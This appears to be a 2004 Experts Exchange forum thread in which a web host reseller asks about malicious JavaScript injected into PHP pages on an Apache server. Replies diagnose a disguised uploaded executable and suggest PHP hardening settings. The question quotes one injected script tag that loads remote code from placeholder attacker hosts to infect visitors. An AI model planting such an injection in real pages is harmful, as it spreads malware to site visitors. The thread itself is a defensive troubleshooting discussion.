?
Solved

Apache PHP Code Insert Exploit Problem

Posted on 2004-04-27
8
Medium Priority
?
1,082 Views
Last Modified: 2013-12-04
Hello,

My web host of whom I am a reseller runs Linux Red Hat Apache 1.3.29 and PHP 4.3.6.

We have a sever code insert problem.

On all PHP pages there is sometimes a java script insert which is only created in the user's browser when accessing the page.

The Java script points to a gif file on another web hoster's server and there calls again a redirect which infects to user with a trojan or virus through the browser.

This code insert is periodically, sometimes it is there and sometimes not.

Below please find an example of the code insert. The insert however changes often:

script language="JavaScript" src="http://www.bad.tld/some/path/icon.gif?i=43&to= http://www.mad.tld/for_admin.html

It looks like soemthing can trigger a dynamic loading of an Apache module that causes the code insert into PHP pages.

The tech tried to stop it with mod_security but this mod stops many PHP apps from working e.g CMS, Forums etc.

Anybody has experience with this problem and hopefully a working fix.

Thanks for any help.
0
Comment
Question by:Wildorchid
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
8 Comments
 

Author Comment

by:Wildorchid
ID: 10928429
We have solved the problem.

Somehow somebody uploaded a file named icon.gif probably through a forum or CMS leak. This icon.gif is an exe that reconfigures PHP to load tons of extra modules and manipulates Apache. Then they use a robot that calls the icon.gif URL and triggers the PHP modification from time to time.

Then we have disabled dlopen: disable_functions = dlopen

Hope we got rid of this now and hope above helps somebody else too.

Cheers
0
 
LVL 51

Expert Comment

by:ahoffmann
ID: 10943092
allow_url_fopen = Off
open_basedir = /path/to/your/docuemntroot

should also help fixing such malicious code
Unfortunately PHP is a security pain, its hard to fix all problems.
Best ist to use your CMS on a development server, and then copy the content to the live server, where you've disabpled most PHP scripts.
0
 
LVL 40

Expert Comment

by:jlevie
ID: 11011048
I'd say you still have a problem. When correctly set up there should be no way for anything to manipulate what modules apache or PHP loads unless there's a root exploit available on the server. My guess is that your RedHat system doesn't have all of the security errata installed and someone is exploiting a vulnerability that one of those errata addresses.

I agree with ahoffman that one should never have a CMS on a live server, but even then the process that extracts web page code from a CMS and updates the web server application should be running as the Apache user, who should in turn own all web content. And of course no web application may ever directly do anything as root. In cases where that's necessary the web app should leave a file with a fixed and known format for a root task to pick up, sanity check, and execute only if the contents of the file are "safe". And I can't emphasize enough that the sanit checking must exhibit extreme paranoia.
0
2017 Webroot Threat Report

MSPs: Get the facts you need to protect your clients.
The 2017 Webroot Threat Report provides a uniquely insightful global view into the analysis and discoveries made by the Webroot® Threat Intelligence Platform to provide insights on key trends and risks as seen by our users.

 
LVL 51

Expert Comment

by:ahoffmann
ID: 11077727
disagreed
if such a code is in a PHP page, then my suggestion prevents the server to load external URLs
0
 
LVL 1

Accepted Solution

by:
Computer101 earned 0 total points
ID: 11113492
PAQed, with points refunded (500)

Computer101
E-E Admin
0
 
LVL 51

Expert Comment

by:ahoffmann
ID: 11145555
Computer101, why did you PAQ *with* refund?
0

Featured Post

Three Reasons Why Backup is Strategic

Backup is strategic to your business because your data is strategic to your business. Without backup, your business will fail. This white paper explains why it is vital for you to design and immediately execute a backup strategy to protect 100 percent of your data.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Article by: btan
The intent is not to repeat what many has know about Ransomware but more to join its dots of what is it, who are the victims, why it exists, when and how we respond on infection. Lastly, sum up in a glance to share such information with more to help…
Our Group Policy work started with Small Business Server in 2000. Microsoft gave us an excellent OU and GPO model in subsequent SBS editions that utilized WMI filters, OU linking, and VBS scripts. These are some of experiences plus our spending a lo…
NetCrunch network monitor is a highly extensive platform for network monitoring and alert generation. In this video you'll see a live demo of NetCrunch with most notable features explained in a walk-through manner. You'll also get to know the philos…
In this video, Percona Director of Solution Engineering Jon Tobin discusses the function and features of Percona Server for MongoDB. How Percona can help Percona can help you determine if Percona Server for MongoDB is the right solution for …
Suggested Courses
Course of the Month13 days, 2 hours left to enroll

777 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question